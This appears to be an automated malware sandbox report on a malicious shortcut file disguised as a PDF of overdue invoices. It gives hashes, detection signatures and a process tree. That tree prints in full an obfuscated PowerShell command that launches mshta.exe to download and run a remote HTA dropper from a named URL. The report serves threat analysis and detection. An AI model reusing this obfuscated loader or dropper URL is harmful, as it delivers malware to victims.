Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
17-08-2022 07:11
Static task
static1
Behavioral task
behavioral1
Sample
FACTURAS VENCIDAS.pdf.lnk
Resource
win7-20220812-en
windows7-x64
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
FACTURAS VENCIDAS.pdf.lnk
Resource
win10v2004-20220812-en
windows10-2004-x64
12 signatures
150 seconds
General
-
Target
FACTURAS VENCIDAS.pdf.lnk
-
Size
4KB
-
MD5
321240e769016fa53af40cb6ab98cc0d
-
SHA1
44b6143d5ec750d11f38d311622ef849b8ec5178
-
SHA256
517b9d73ba6d6fd29ef0e008a01b11487c9217e466e17bb073a05412b3932e5b
-
SHA512
b8189176905d269d0135267ac47ac30f140ab76cb8ae5025250691f99f6b8ae186d05bad3bee3521726d6dc4f14f25cca3235aebcd9a9f56c8b8e93eb52e86dd
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://movilidadvialcolombia.com/envios.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 980 mshta.exe 5 980 mshta.exe 6 980 mshta.exe 7 980 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1184 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2040 wrote to memory of 1184 2040 cmd.exe 29 PID 2040 wrote to memory of 1184 2040 cmd.exe 29 PID 2040 wrote to memory of 1184 2040 cmd.exe 29 PID 1184 wrote to memory of 980 1184 powershell.exe 30 PID 1184 wrote to memory of 980 1184 powershell.exe 30 PID 1184 wrote to memory of 980 1184 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\FACTURAS VENCIDAS.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $RmOQa='oaaviioo.ai:loavstm.nl/daoMcbHhemdihvpTlmttslsc//i'; &(-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])) :\ (-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])); :\ ^* (-join($RmOQa[(-49742+49760),(25567-25551),(-65481+65510),(-31827+31844),(-5690+5691)])); foreach($bxcdxk in @((-7238+7268),(15062-15045),(12459-12442),(60614-60577),(-27262+27278),(-16356+16367),(-59583+59605),(-38422+38444),(4418-4400),(-45458+45458),(-8330+8333),(53548-53544),(31137-31125),(-32813+32817),(10370-10347),(2734-2733),(32919-32896),(-55404+55407),(25253-25249),(-60232+60233),(-22204+22216),(-3617+3644),(-25191+25191),(16991-16979),(-56149+56149),(-64411+64429),(-33829+33857),(25970-25966),(-29913+29914),(28759-28751),(-21336+21363),(29847-29847),(16247-16229),(-50154+50176),(-35833+35864),(-60816+60836),(54974-54971),(-1453+1457),(21056-21056),(30922-30906),(25154-25146),(39267-39237),(54694-54677),(-5241+5242))) {$nxFNKh+= $RmOQa[$bxcdxk]}; ^* $nxFNKh;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://movilidadvialcolombia.com/envios.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:980
-
-